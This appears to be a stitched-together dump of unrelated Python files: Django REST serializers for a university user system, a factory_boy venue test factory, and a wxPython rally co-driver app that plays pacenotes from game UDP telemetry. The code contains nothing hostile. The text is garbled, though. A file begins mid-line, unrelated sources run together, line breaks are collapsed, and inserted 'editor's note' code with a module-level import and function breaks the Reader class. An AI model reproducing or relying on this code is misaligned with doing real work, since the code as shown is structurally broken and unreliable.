UserSerializer(serializers.ModelSerializer): date_of_birth = serializers.ReadOnlyField() student = StudentSerializer(many=False, read_only=True) 
    teacher = TeacherSerializer(many=False, read_only=True)

    class Meta(object):
        model = User
        fields = (
            'id', 'email', 'first_name', 'last_name', 'patronymic', 'bio',
            'avatar', 'date_of_birth', 'date_joined', 'last_update',
            'news_subscription', 'is_active', 'is_admin', 'is_moderator',
            'user_permissions', 'is_student', 'is_teacher', 'student',
            'teacher', 'password',
        )
        extra_kwargs = {'password': {'write_only': True}}


class UpdateUserSerializer(serializers.ModelSerializer):

    class Meta(object):
        model = User
        fields = (
            'email', 'first_name', 'last_name', 'patronymic', 'bio',
            'news_subscription',
        )


class BulkUpdateUserSerializer(serializers.ModelSerializer):

    class Meta(object):
        model = User
        fields = ('first_name', 'last_name', 'patronymic', 'bio', 'avatar',
                  'date_of_birth', 'news_subscription', 'user_permissions')


class DeleteAllSerializer(serializers.ModelSerializer):

    class Meta(object):
        model = User
        fields = ('email', 'password')


class CreateTeacherSerializer(serializers.ModelSerializer):
    faculty = serializers.CharField(max_length=128)
    read_only_fields = ('date_joined',)

    class Meta(object):
        model = User
        fields = (
            'email',
            'password',
            'faculty',
        )


class UpdateTeacherSerializer(serializers.ModelSerializer):
    faculty = FacultySerializer(many=False, read_only=True)

    class Meta(object):
        model = Teacher
        fields = ('faculty',)

    def save(self, user, data):
        try:
            name = data.get('faculty').get('name')
            faculty = Faculty.objects.get(name=name)
            user.faculty = faculty
            user.save()
        except Faculty.DoesNotExist:
            raise ValueError("Faculty does not exist")


class CreateStudentSerializer(serializers.ModelSerializer):
    faculty = serializers.CharField(max_length=128)
    profession = serializers.CharField(max_length=128)
    acad_group = serializers.CharField(max_length=128)
    read_only_fields = ('date_joined',)

    class Meta(object):
        model = User
        fields = (
            'email',
            'password',
            'faculty',
            'profession',
            'acad_group',
        )


class UpdateStudentSerializer(serializers.ModelSerializer):
    faculty = FacultySerializer(many=False, read_only=True)
    profession = ProfessionSerializer(many=False, read_only=True)

    class Meta(object):
        model = Student
        fields = ('faculty', 'profession', 'acad_group',)

    def save(self, user, data):
        try:
            name = data.get('faculty').get('name')
            faculty = Faculty.objects.get(name=name)
            user.faculty = faculty
            profession_name = data.get('profession').get('name')
            profession = Profession.objects.get(name=profession_name)
            user.profession = profession
            acad_group = data.get('acad_group')
            # Only persist the change when the submitted group is one of the
            # known ACAD_GROUPS_CHOICES values.
            for choice in list(ACAD_GROUPS_CHOICES):
                if user.acad_group == choice[0] and choice[0] == acad_group:
                    user.save()
                elif choice[0] == acad_group:
                    user.acad_group = choice[0]
                    user.save()
        except (Faculty.DoesNotExist, Profession.DoesNotExist):
            raise ValueError("Faculty or Profession does not exist")


class SetModeratorSerializer(serializers.ModelSerializer):

    class Meta(object):
        model = User
        fields = ('id', 'is_moderator',)


class NewsSubscriptionSerializer(serializers.ModelSerializer):

    class Meta(object):
        model = User
        fields = ('id', 'news_subscription',)


"""Factories to help in venue tests."""
from factory import Sequence, SubFactory

from muckr_api.venue.models import Venue
from tests.factories import BaseFactory
from tests.user.factories import UserFactory


class VenueFactory(BaseFactory):
    """Venue factory."""

    name = Sequence(lambda n: "venue{0}".format(n))
    city = Sequence(lambda n: "city{0}".format(n))
    country = Sequence(lambda n: "country{0}".format(n))
    user = SubFactory(UserFactory)

    class Meta:
        """Factory configuration."""

        model = Venue


#!python3
#
# DiRTy Pacenotes
#
# Copyright [2017 - 2019] []
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this
file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import csv import glob import os import socket import struct import sys import itertools import ast import math import win32gui, win32con import wx import wx.adv import wx.aui import wx.grid import wx.lib.intctrl as ict import wx.lib.scrolledpanel as scr import wx.lib.agw.ultimatelistctrl as ulc import wx.lib.agw.flatnotebook as fnb import wx.lib.agw.persist as per from wx.lib.wordwrap import wordwrap from pubsub import pub from collections import defaultdict, OrderedDict from configobj import ConfigObj from threading import Thread from queue import Queue from pydub import AudioSegment from pydub.playback import play from pathlib import Path hide = win32gui.GetForegroundWindow() win32gui.ShowWindow(hide, win32con.SW_HIDE) app_path = os.getcwd() data_path = os.path.join(app_path, 'data') img_path = os.path.join(data_path, 'images') config_ini = os.path.join(data_path, 'config.ini') sound_bank = {} q_snd = Queue() q_run = Queue() q_rst = Queue() q_del = Queue() q_vol = Queue() q_dic = Queue() q_cfg = Queue() q_stg = Queue() # UDP server class Reader(Thread): def __init__(self): Thread.__init__(self) if not q_cfg.empty(): config = q_cfg.get_nowait() q_cfg.task_done() self.server = config[0] self.co_driver = config[1] self.delay = config[2] self.volume = config[3] self.countdown = config[4] co_path = os.path.join(app_path, 'co-drivers', self.co_driver) self.pace_path = os.path.join(co_path, 'pacenotes') self.snd_path = os.path.join(co_path, 'sounds') if not q_stg.empty(): self.dic_stages = q_stg.get_nowait() q_stg.task_done() self.dic_pacenotes = OrderedDict() self.dic_new_pacenotes = OrderedDict() self.new_dist = 0 self.pos_y = 0 self.total_laps = 0 self.lap_time = 0 self.stage_length = 0 self.snd_ext = '' self.stage_path = '' self.stage_name = '' self.stage_name_dic = '' self.stage_folder = '' self.stage_file = '' self.count_played = False self.restart = False self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) self.sock.bind(self.server) self.running = True self.setDaemon(True) self.start() def run(self): try: snd_file_list = q_snd.get_nowait() loaded = 0 for snd_file in snd_file_list: sound = Path(snd_file).stem snd, self.snd_ext = os.path.splitext(snd_file) try: sound_bank[sound] = AudioSegment.from_file(snd_file) except IndexError: continue loaded += 1 wx.CallAfter(pub.sendMessage, 'get_progress', arg=loaded) except IOError: pass while self.running: self.receive_udp_packet() # Has its own breakable while loop. self.detect_stage() self.read_pacenotes_file() self.receive_udp_stream() # Has its own infinite while loop. self.sock.shutdown(socket.SHUT_RD) self.sock.close() # Perform initial UDP detection. 
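# Editor's note: illustrative sketch only; the Reader's own detection and
# streaming methods follow below.  Each telemetry packet is decoded as 64
# little-endian floats ('64f', 256 bytes).  The index-to-name mapping in this
# sketch is inferred from how receive_udp_packet() and receive_udp_stream()
# use udp_data in this file, not from an official protocol document.

import struct
from collections import namedtuple

Telemetry = namedtuple(
    'Telemetry',
    'total_time lap_time distance pos_y lap total_laps track_length')

def parse_packet(packet):
    """Decode only the fields this app reads from a 256-byte UDP packet."""
    data = struct.unpack('64f', packet[0:256])
    return Telemetry(
        total_time=data[0], lap_time=data[1], distance=data[2],
        pos_y=data[5], lap=data[59], total_laps=data[60],
        track_length=data[61])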
def receive_udp_packet(self): while True: udp_stream = self.sock.recv(512) if not udp_stream: break # lost connection udp_data = struct.unpack('64f', udp_stream[0:256]) total_time = int(udp_data[0]) self.pos_y = int(udp_data[5]) curr_lap = int(udp_data[59]) self.total_laps = int(udp_data[60]) self.stage_length = round(udp_data[61], 4) # wx.CallAfter(pub.sendMessage, 'get_stage_length', arg=self.stage_length) if total_time == 0 != curr_lap: # Wait for udp from next stage after finish. continue break # Detect stage. def detect_stage(self): for k, v in list(self.dic_stages.items()): if self.stage_length == k and self.total_laps == 1: # Rally stage indicator. for s in v: if len(v) == 1: stg = s.split(',') self.stage_name_dic = stg[1] self.stage_folder = stg[2] elif len(v) == 2: stg = s.split(',') pos_start = int(stg[0]) if self.pos_y == pos_start: self.stage_name_dic = stg[1] self.stage_folder = stg[2] if self.stage_name_dic != self.stage_name: self.stage_name = self.stage_name_dic self.stage_path = os.path.join(self.pace_path, self.stage_folder) self.stage_file = os.path.join(self.stage_path, self.stage_name + '.txt') wx.CallAfter(pub.sendMessage, 'get_stage', arg1=self.stage_name, arg2=self.stage_path) # Read pacenotes file. def read_pacenotes_file(self): self.dic_pacenotes.clear() with open(self.stage_file, 'r') as f: for line in f: if line and line.strip(): lis = line.split(',') # list [curr_dist, sound] key = int(lis[0]) # key as integer val = lis[1].strip() # value as string self.dic_pacenotes[key] = [] # empty list self.dic_pacenotes[key].append(val) # dictionary else: continue # skip empty lines # Receive UDP stream. def receive_udp_stream(self): last_dist = -20 last_time = 0 # Play countdown sound. try: if self.countdown and not self.count_played and last_time == 0: sound_count = sound_bank['countdown_start'] + self.volume play(sound_count) self.count_played = True except KeyError: wx.CallAfter(pub.sendMessage, 'key_error', arg='countdown_start') return while self.running: if not q_run.empty(): self.running = q_run.get_nowait() q_run.task_done() if not q_rst.empty(): reset = q_rst.get_nowait() q_rst.task_done() if reset is True: return if not q_del.empty(): self.delay = q_del.get_nowait() q_del.task_done() if not q_vol.empty(): self.volume = q_vol.get_nowait() q_vol.task_done() if not q_dic.empty(): self.dic_pacenotes.clear() dic_pace = q_dic.get_nowait() q_dic.task_done() for key, val in list(dic_pace.items()): self.dic_pacenotes[int(key)] = [] self.dic_pacenotes[int(key)].append(val.strip()) udp_stream = self.sock.recv(512) if not udp_stream: break # lost connection udp_data = struct.unpack('64f', udp_stream[0:256]) total_time = udp_data[0] lap_time = int(udp_data[1]) curr_dist = int(udp_data[2]) curr_lap = int(udp_data[59]) if total_time == last_time and lap_time == 0: self.restart = True else: self.restart = False wx.CallAfter(pub.sendMessage, 'get_pause', arg=self.restart) # Play sounds. if lap_time > 0: # Timing clock started. self.count_played = False if curr_lap == 0: # Car on stage but before finish line. wx.CallAfter(pub.sendMessage, 'get_dist', arg1=curr_dist, arg2=last_dist) self.dic_new_pacenotes.clear() for dist, pace in list(self.dic_pacenotes.items()): if curr_dist < self.delay: self.new_dist = math.ceil(dist / 2) elif curr_dist >= self.delay: self.new_dist = dist - self.delay self.dic_new_pacenotes[self.new_dist] = pace for new_dist, new_pace in list(self.dic_new_pacenotes.items()): if curr_dist == new_dist: if curr_dist > last_dist: # Play pacenotes. 
for curr_pace in new_pace: snd = curr_pace.split() for sound_name in snd: try: sound_pace = sound_bank[sound_name] + self.volume play(sound_pace) except KeyError: wx.CallAfter(pub.sendMessage, 'key_error', arg=sound_name) pass elif 0 < curr_dist < last_dist: # Play wrong_way. try: sound_wrong = sound_bank['wrong_way'] + self.volume play(sound_wrong) except KeyError: wx.CallAfter(pub.sendMessage, 'key_error', arg='wrong_way') pass elif curr_lap == 1: # Stage is finished. break last_dist = curr_dist elif lap_time == 0: # Timing clock not started. break last_time = total_time class MenuBar(wx.MenuBar): def __init__(self, parent): super(MenuBar, self).__init__() self.parent = parent # File Menu. self.file_menu = wx.Menu() self.menu_open = wx.MenuItem(self.file_menu, wx.ID_OPEN, wx.GetStockLabel(wx.ID_OPEN) + '\tCtrl+O', 'Open existing pacenotes file') self.menu_open.SetBitmap(wx.Bitmap(os.path.join(img_path, 'open.png'))) self.menu_save = wx.MenuItem(self.file_menu, wx.ID_SAVE, wx.GetStockLabel(wx.ID_SAVE) + '\tCtrl+S', 'Overwrite current pacenotes file') self.menu_save.SetBitmap(wx.Bitmap(os.path.join(img_path, 'save.png'))) self.menu_creator = wx.MenuItem(self.file_menu, wx.ID_ANY, 'Creator' + '\tCtrl+R', 'Change co-driver pacenote commands') self.menu_creator.SetBitmap(wx.Bitmap(os.path.join(img_path, 'settings.png'))) self.menu_settings = wx.MenuItem(self.file_menu, wx.ID_ANY, 'Settings' + '\tCtrl+T', 'Change app settings') self.menu_settings.SetBitmap(wx.Bitmap(os.path.join(img_path, 'settings.png'))) self.menu_quit = wx.MenuItem(self.file_menu, wx.ID_EXIT, wx.GetStockLabel(wx.ID_EXIT) + '\tCtrl+Q', 'Close the app') self.menu_quit.SetBitmap(wx.Bitmap(os.path.join(img_path, 'exit.png'))) self.file_menu.Append(self.menu_open) self.file_menu.Append(self.menu_save) self.file_menu.AppendSeparator() self.file_menu.Append(self.menu_creator) self.file_menu.Append(self.menu_settings) self.file_menu.AppendSeparator() self.file_menu.Append(self.menu_quit) self.menu_save.Enable(False) self.Bind(wx.EVT_MENU, self.parent.on_open, self.menu_open) self.Bind(wx.EVT_MENU, self.parent.on_save, self.menu_save) self.Bind(wx.EVT_MENU, self.parent.on_creator, self.menu_creator) self.Bind(wx.EVT_MENU, self.parent.on_settings, self.menu_settings) self.Bind(wx.EVT_MENU, self.parent.on_quit, self.menu_quit) # Edit Menu. 
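# Editor's note -- aside on the call-timing arithmetic in receive_udp_stream()
# above (the menu code resumes below).  With an effective self.delay of 100 m,
# a pacenote stored at 800 m is re-keyed to 700 m, so it is called 100 m
# early; while the car is still inside the first 100 m of the stage the stored
# distances are halved instead, which keeps the opening calls from being
# skipped.  A worked example (delay value chosen for illustration):
#
#   delay = 100
#   remap = lambda dist, curr: math.ceil(dist / 2) if curr < delay else dist - delay
#   remap(800, 500)   # -> 700 (note called 100 m early)
#   remap(150, 40)    # -> 75  (early notes are halved, not shifted)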
self.edit_menu = wx.Menu() # self.menu_cut = wx.MenuItem(self.file_menu, wx.ID_CUT, wx.GetStockLabel(wx.ID_CUT) + '\tCtrl+X', # 'Cut selected text') # self.menu_cut.SetBitmap(wx.Bitmap('data/images/cut.png', wx.BITMAP_TYPE_PNG)) # self.menu_copy = wx.MenuItem(self.file_menu, wx.ID_COPY, wx.GetStockLabel(wx.ID_COPY) + '\tCtrl+C', # 'Copy selected text') # self.menu_copy.SetBitmap(wx.Bitmap('data/images/copy.png', wx.BITMAP_TYPE_PNG)) # self.menu_paste = wx.MenuItem(self.file_menu, wx.ID_PASTE, wx.GetStockLabel(wx.ID_PASTE) + '\tCtrl+V', # 'Paste text from clipboard') # self.menu_paste.SetBitmap(wx.Bitmap('data/images/paste.png', wx.BITMAP_TYPE_PNG)) # self.menu_delete = wx.MenuItem(self.file_menu, wx.ID_DELETE, wx.GetStockLabel(wx.ID_DELETE) + '\tDel', # 'Delete selected text') # self.menu_delete.SetBitmap(wx.Bitmap('data/images/delete.png', wx.BITMAP_TYPE_PNG)) self.menu_select_all = wx.MenuItem(self.file_menu, 20000, 'Select All', 'Select all lines of pacenotes', wx.ITEM_CHECK) # self.edit_menu.Append(self.menu_cut) # self.edit_menu.Append(self.menu_copy) # self.edit_menu.Append(self.menu_paste) # self.edit_menu.AppendSeparator() # self.edit_menu.Append(self.menu_delete) self.edit_menu.Append(self.menu_select_all) # self.Bind(wx.EVT_TEXT_CUT, self.menu_cut) # self.Bind(wx.EVT_TEXT_COPY, self.menu_copy) # self.Bind(wx.EVT_TEXT_PASTE, self.menu_paste) # self.Bind(wx.EVT_TEXT, self.menu_delete) self.Bind(wx.EVT_MENU, self.parent.on_tick, self.menu_select_all) # Autosave Menu. self.autosave_menu = wx.Menu() self.radio_off = self.autosave_menu.AppendRadioItem(1000, 'OFF') self.radio_two = self.autosave_menu.AppendRadioItem(2, '2 min') self.radio_five = self.autosave_menu.AppendRadioItem(5, '5 min') self.radio_ten = self.autosave_menu.AppendRadioItem(10, '10 min') for radio in [self.radio_off, self.radio_two, self.radio_five, self.radio_ten]: if int(self.parent.interval) == radio.GetId(): radio.Check() self.Bind(wx.EVT_MENU, self.parent.on_interval, radio) # Delay Menu. self.delay_menu = wx.Menu() self.delay_recce = self.delay_menu.AppendRadioItem(100, 'Recce') self.delay_late = self.delay_menu.AppendRadioItem(150, 'Late') self.delay_normal = self.delay_menu.AppendRadioItem(200, 'Normal') self.delay_earlier = self.delay_menu.AppendRadioItem(250, 'Earlier') self.delay_early = self.delay_menu.AppendRadioItem(300, 'Very Early') for radio in [self.delay_recce, self.delay_late, self.delay_normal, self.delay_earlier, self.delay_early]: if self.parent.delay == radio.GetId(): radio.Check() self.Bind(wx.EVT_MENU, self.parent.on_delay, radio) # self.delay_menu.InsertSeparator(4) # Help Menu. 
self.help_menu = wx.Menu() self.menu_about = wx.MenuItem(self.help_menu, wx.ID_ABOUT, wx.GetStockLabel(wx.ID_ABOUT), 'About this app') self.menu_about.SetBitmap(wx.Bitmap(os.path.join(img_path, 'about.png'))) self.help_menu.Append(self.menu_about) self.Bind(wx.EVT_MENU, self.parent.on_about, self.menu_about) class TaskBar(wx.adv.TaskBarIcon): def __init__(self, frame): wx.adv.TaskBarIcon.__init__(self) self.frame = frame self.SetIcon(frame.icon, frame.title) self.Bind(wx.EVT_MENU, self.on_show, id=1) self.Bind(wx.EVT_MENU, self.on_hide, id=2) self.Bind(wx.EVT_MENU, self.on_close, id=3) def CreatePopupMenu(self): menu = wx.Menu() menu.Append(1, 'Show') menu.Append(2, 'Hide') menu.Append(3, 'Close') return menu def on_show(self, event): if not self.frame.IsShown(): self.frame.Show() def on_hide(self, event): if self.frame.IsShown(): self.frame.Hide() def on_close(self, event): self.frame.Close() class HandInput(wx.Dialog): # not used at the moment def __init__(self, parent): wx.Dialog.__init__(self, parent) self.parent = parent self.SetSize(wx.Size(180, 80)) self.SetTitle('DiRTy Handbrake') self.SetIcon(self.parent.icon) self.Center(wx.BOTH) panel = wx.Panel(self, name='panel_handbrake') box_main = wx.BoxSizer(wx.HORIZONTAL) label_handbrake = wx.StaticText(panel, 0, 'APPLY HANDBRAKE') box_main.Add(label_handbrake, 0, wx.ALIGN_CENTER_HORIZONTAL | wx.ALL, 15) panel.SetSizer(box_main) # self.SetReturnCode() class TextDropTarget(wx.TextDropTarget): def __init__(self, target): wx.TextDropTarget.__init__(self) self.target = target def OnDropText(self, x, y, data): self.target.InsertItem(sys.maxsize, data) return True class Settings(wx.Dialog): def __init__(self, parent): wx.Dialog.__init__(self, parent) self.parent = parent self.SetSize(wx.Size(260, 340)) self.SetTitle('DiRTy Pacenotes - Service Area') self.SetIcon(self.parent.icon) self.Center(wx.BOTH) panel = wx.Panel(self, name='panel_settings') box_main = wx.BoxSizer(wx.VERTICAL) box_server = wx.StaticBox(panel, 0, 'UDP SERVER') sbs_server = wx.StaticBoxSizer(box_server) label_ip = wx.StaticText(panel, 0, 'IP') self.ip_value = wx.TextCtrl(panel, size=wx.Size(60, 23)) self.ip_value.SetValue(self.parent.ip) sbs_server.Add(label_ip, 0, wx.ALIGN_CENTER_VERTICAL | wx.LEFT, 10) sbs_server.Add(self.ip_value, 0, wx.ALL, 10) label_port = wx.StaticText(panel, 0, 'Port') self.port_value = ict.IntCtrl(panel, size=wx.Size(45, 23), min=10000, max=99999, value=self.parent.port, limited=True, allow_none=True) self.port_value.SetValue(self.parent.port) sbs_server.Add(label_port, 0, wx.ALIGN_CENTER_VERTICAL) sbs_server.Add(self.port_value, 0, wx.ALL, 10) box_co_driver = wx.StaticBox(panel, 0, 'CO-DRIVER') sbs_co_driver = wx.StaticBoxSizer(box_co_driver) co_drivers = os.listdir('co-drivers') self.combo_co_driver = wx.ComboBox(panel, choices=co_drivers, style=wx.CB_READONLY) self.combo_co_driver.SetValue(self.parent.co_driver) self.combo_co_driver.SetFocus() sbs_co_driver.Add(self.combo_co_driver, 0, wx.ALL, 10) box_countdown = wx.BoxSizer(wx.HORIZONTAL) self.count_check = wx.CheckBox(panel, 0, 'COUNTDOWN') self.count_check.SetValue(bool(self.parent.countdown)) box_countdown.Add(self.count_check, 0, wx.ALL, 10) ''' box_handbrake = wx.StaticBox(panel, 0, 'HANDBRAKE') sbs_handbrake = wx.StaticBoxSizer(box_handbrake) button_handbrake = wx.Button(panel, wx.ID_ANY, 'CHANGE') button_handbrake.Bind(wx.EVT_BUTTON, self.parent.on_change_handbrake) self.handbrake_value = wx.TextCtrl(panel, size=wx.Size(60, 23)) self.handbrake_value.SetValue(self.parent.handbrake) 
sbs_handbrake.Add(self.handbrake_value, 0, wx.ALL, 10) sbs_handbrake.Add(button_handbrake, 0, wx.ALIGN_CENTER_VERTICAL | wx.LEFT, 10) ''' bs_buttons = wx.BoxSizer(wx.HORIZONTAL) button_reload = wx.Button(panel, id=2, label='SAVE and RELOAD') button_reload.Bind(wx.EVT_BUTTON, self.parent.on_reload) bs_buttons.Add(button_reload, 0) box_main.Add(sbs_server, 0, wx.ALL, 20) box_main.Add(sbs_co_driver, 0, wx.LEFT, 20) box_main.Add(box_countdown, 0, wx.LEFT, 20) # box_main.Add(sbs_handbrake, 0, wx.LEFT | wx.RIGHT, 20) box_main.Add(bs_buttons, 0, wx.ALIGN_CENTER_HORIZONTAL | wx.TOP, 20) panel.SetSizer(box_main) class Creator(wx.Dialog): def __init__(self, parent): wx.Dialog.__init__(self, parent) self.parent = parent self.SetSize(wx.Size(640, 480)) self.SetTitle('DiRTy Pacenotes - ' + self.parent.co_driver) self.SetBackgroundColour('light grey') self.SetIcon(self.parent.icon) self.Center(wx.BOTH) self.SetWindowStyle(wx.DEFAULT_DIALOG_STYLE) self.dict_list_c = {} self.cat_list_c = [] self.sound_list_c = [] self.audio_list_c = [] self.selection_left = [] self.selection_right = [] panel_sizer = wx.BoxSizer(wx.HORIZONTAL) # Left side box_left = wx.BoxSizer(wx.HORIZONTAL) self.tabs_left = fnb.FlatNotebook(self, agwStyle=fnb.FNB_HIDE_ON_SINGLE_TAB) box_left.Add(self.tabs_left, 1, wx.EXPAND) # Right side box_right = wx.BoxSizer(wx.VERTICAL) # Panel with buttons (right top) box_but_top = wx.BoxSizer(wx.HORIZONTAL) box_but_bot = wx.BoxSizer(wx.HORIZONTAL) self.button_in = wx.Button(self, wx.ID_ANY, label=u'IN') self.button_out = wx.Button(self, wx.ID_ANY, label=u'OUT') button_add = wx.Button(self, wx.ID_ANY, label='ADD CATEGORY') button_reload = wx.Button(self, id=1, label='SAVE and RELOAD') button_reset = wx.Button(self, wx.ID_ANY, label='RESET SOUNDS') self.button_in.Disable() self.button_out.Disable() box_but_top.Add(self.button_in, 0, wx.ALL, 5) box_but_top.Add(self.button_out, 0, wx.ALL, 5) box_but_top.Add(button_add, 0, wx.ALL, 5) box_but_bot.Add(button_reset, 0, wx.ALL, 5) box_but_bot.Add(button_reload, 0, wx.ALL, 5) self.button_in.Bind(wx.EVT_BUTTON, self.parent.sounds_in) self.button_out.Bind(wx.EVT_BUTTON, self.parent.sounds_out) button_reset.Bind(wx.EVT_BUTTON, self.parent.reset_sounds) button_reload.Bind(wx.EVT_BUTTON, self.parent.on_reload) button_add.Bind(wx.EVT_BUTTON, self.parent.add_category) # Panel with categories (right bottom) box_cat = wx.BoxSizer(wx.HORIZONTAL) self.tabs_right = wx.aui.AuiNotebook(self, style=wx.aui.AUI_NB_WINDOWLIST_BUTTON | wx.aui.AUI_NB_TAB_MOVE | wx.aui.AUI_NB_SCROLL_BUTTONS | wx.aui.AUI_NB_CLOSE_BUTTON) self.tabs_right.Bind(wx.aui.EVT_AUINOTEBOOK_PAGE_CLOSE, self.parent.on_tab_close) box_cat.Add(self.tabs_right, 1, wx.EXPAND) box_right.Add(box_but_top, 0, wx.ALIGN_CENTER_HORIZONTAL) box_right.Add(box_cat, 2, wx.EXPAND | wx.ALL, 5) box_right.Add(box_but_bot, 0, wx.ALIGN_CENTER_HORIZONTAL) # Add sizers to panel_sizer. panel_sizer.Add(box_left, 1, wx.EXPAND | wx.ALL, 10) panel_sizer.Add(box_right, 0, wx.EXPAND | wx.ALL, 10) self.SetSizer(panel_sizer) self.create_audio() self.create_sounds() # Define methods. 
def create_audio(self): self.tabs_left.DeleteAllPages() for s in os.listdir(self.parent.sound_path): (name, ext) = s.split('.') self.audio_list_c.append(name) for sublist in list(self.parent.sound_list.values()): for item in sublist: self.sound_list_c.append(item) audio_list_final = self.parent.diff(self.audio_list_c, self.sound_list_c) audio_list_final.sort() tab_left = wx.Panel(self.tabs_left, style=wx.BORDER_NONE, id=1) tab_left.SetBackgroundColour('white') tab_left.SetCursor(wx.Cursor(wx.CURSOR_HAND)) list_box_left = wx.ListBox(tab_left, choices=audio_list_final, style=wx.LB_MULTIPLE) h_box_tabs = wx.BoxSizer(wx.HORIZONTAL) h_box_tabs.Add(list_box_left, 0, wx.EXPAND) tab_left.SetSizer(h_box_tabs) list_box_left.Bind(wx.EVT_LISTBOX, self.parent.on_listbox_left) self.tabs_left.AddPage(tab_left, 'audio') def create_sounds(self): self.tabs_right.DeleteAllPages() for category, sounds_list in list(self.parent.sound_list.items()): tab_right = wx.Panel(self.tabs_right, style=wx.TAB_TRAVERSAL | wx.BORDER_NONE, name=category, id=2) tab_right.SetBackgroundColour('white') tab_right.SetCursor(wx.Cursor(wx.CURSOR_HAND)) list_box_right = wx.ListBox(tab_right, choices=sounds_list, style=wx.LB_MULTIPLE) h_box_tabs = wx.BoxSizer(wx.HORIZONTAL) h_box_tabs.Add(list_box_right, 0, wx.EXPAND) tab_right.SetSizer(h_box_tabs) list_box_right.Bind(wx.EVT_LISTBOX, self.parent.on_listbox_right) self.tabs_right.AddPage(tab_right, category) class Editor(wx.Window): def __init__(self, parent): wx.Window.__init__(self, parent) self.parent = parent self.SetBackgroundColour('white') self.SetWindowStyle(wx.BORDER_THEME) # SCROLLED PANEL # self.scrolled_panel = scr.ScrolledPanel(self, style=wx.BORDER_NONE) self.scrolled_panel.SetupScrolling(scroll_x=False, rate_y=8, scrollToTop=False) self.scrolled_panel.SetBackgroundColour('white') self.scrolled_panel.SetAutoLayout(1) logo = wx.StaticBitmap(self.scrolled_panel) logo.SetBitmap(wx.Bitmap(os.path.join(img_path, 'logo.png'))) self.v_box = wx.BoxSizer(wx.VERTICAL) self.scrolled_panel.SetSizer(self.v_box) # BUTTONS # self.button_add = wx.Button(self, label='ADD') self.button_insert = wx.Button(self, label='INSERT') self.button_replace = wx.Button(self, label='REPLACE') self.button_delete = wx.Button(self, label='DELETE') # self.button_undo_pace = but.GenBitmapButton(self, bitmap=wx.Bitmap( # os.path.join(img_path, 'undo.png')), size=(25, 25)) self.buttons = (self.button_add, self.button_insert, self.button_replace, self.button_delete) for button in self.buttons: button.Disable() self.h_box_buttons = wx.BoxSizer(wx.HORIZONTAL) self.h_box_buttons.Add(self.button_add, 0, wx.RIGHT, 24) self.h_box_buttons.Add(self.button_insert, 0, wx.RIGHT, 24) self.h_box_buttons.Add(self.button_replace, 0, wx.RIGHT, 24) self.h_box_buttons.Add(self.button_delete, 0) # self.h_box_buttons.Add(self.button_undo_pace, 0, wx.RIGHT, 10) self.Bind(wx.EVT_BUTTON, self.parent.on_add, self.button_add) self.Bind(wx.EVT_BUTTON, self.parent.on_insert, self.button_insert) self.Bind(wx.EVT_BUTTON, self.parent.on_replace, self.button_replace) self.Bind(wx.EVT_BUTTON, self.parent.on_delete, self.button_delete) # INPUT BOXES # self.input_dist = ict.IntCtrl(self, name='input', size=wx.Size(45, 23), min=0, max=19999, limited=True, allow_none=False) self.input_dist.Disable() self.input_pace = wx.SearchCtrl(self, style=wx.TE_READONLY, size=wx.Size(0, 23)) self.input_pace.SetCancelBitmap(wx.Bitmap(os.path.join(img_path, 'clear.png'))) self.input_pace.SetCursor(wx.Cursor(wx.CURSOR_ARROW)) 
self.input_pace.ShowSearchButton(False) self.input_pace.ShowCancelButton(True) self.input_pace.SetHint('pacenotes') self.input_pace.Bind(wx.EVT_SEARCHCTRL_CANCEL_BTN, self.parent.on_cancel) self.button_play = wx.Button(self) self.button_play.SetInitialSize(wx.Size(24, 24)) self.button_play.SetBitmap(wx.Bitmap(os.path.join(img_path, 'sound_on.png'))) # button_sound.SetBitmapPressed(wx.Bitmap(os.path.join(img_path, 'sound_off.png'))) self.button_play.Disable() self.h_box_input = wx.BoxSizer(wx.HORIZONTAL) self.h_box_input.Add(self.input_dist, 0) self.h_box_input.Add(self.input_pace, 1, wx.RIGHT, 10) self.h_box_input.Add(self.button_play, 0) self.input_dist.Bind(wx.lib.intctrl.EVT_INT, self.parent.on_distance) self.button_play.Bind(wx.EVT_BUTTON, self.parent.on_play) # self.input_dist.Bind(wx.EVT_KEY_UP, self.on_distance) # Keyboard. # self.input_dist.Bind(wx.EVT_TEXT, self.on_distance) # UDP stream. # LABELS # self.label_co_driver = wx.StaticText(self, label=self.parent.co_driver + ' |') self.label_co_driver.SetForegroundColour('dark grey') self.label_co_driver.SetFont(self.parent.font.Bold()) self.label_delay = wx.StaticText(self, label=self.parent.delay_mode) self.label_delay.SetFont(self.parent.font.Bold()) self.label_delay.SetForegroundColour('dark grey') # ONLY FOR GETTING TRACK LENGTH # # self.label_length = wx.StaticText(self) # self.label_length.SetFont(self.parent.font.Bold()) # self.label_length.SetForegroundColour('white') # self.label_length.Bind(wx.lib.intctrl.EVT_INT, self.parent.update_length, self.label_length) label_volume = wx.StaticText(self, label='vol') label_volume.SetForegroundColour('dark grey') self.slider_volume = wx.Slider(self, wx.ID_ANY, int(self.parent.volume), 0, 10, wx.DefaultPosition, (100, 0), wx.SL_MIN_MAX_LABELS) self.slider_volume.SetTickFreq(1) self.slider_volume.SetForegroundColour('dark grey') self.slider_volume.Disable() self.slider_volume.Bind(wx.EVT_SLIDER, self.parent.on_slider) self.h_box_labels = wx.BoxSizer(wx.HORIZONTAL) self.h_box_labels.Add(self.label_co_driver, 0, wx.LEFT | wx.RIGHT, 10) self.h_box_labels.Add(self.label_delay, 0, wx.RIGHT, 10) # self.h_box_labels.Add(self.label_length, 0, wx.TEXT_ALIGNMENT_CENTER) self.h_box_labels.AddStretchSpacer(1) self.h_box_labels.Add(label_volume, 0, wx.ALIGN_RIGHT) self.h_box_labels.Add(self.slider_volume, 0, wx.ALIGN_RIGHT | wx.LEFT | wx.RIGHT, 10) # TABS NOTEBOOK # self.tabs = wx.aui.AuiNotebook(self, style=wx.aui.AUI_NB_WINDOWLIST_BUTTON | wx.aui.AUI_NB_SCROLL_BUTTONS) # self.tabs.SetName('Sounds') # Add sizers to panel_sizer. 
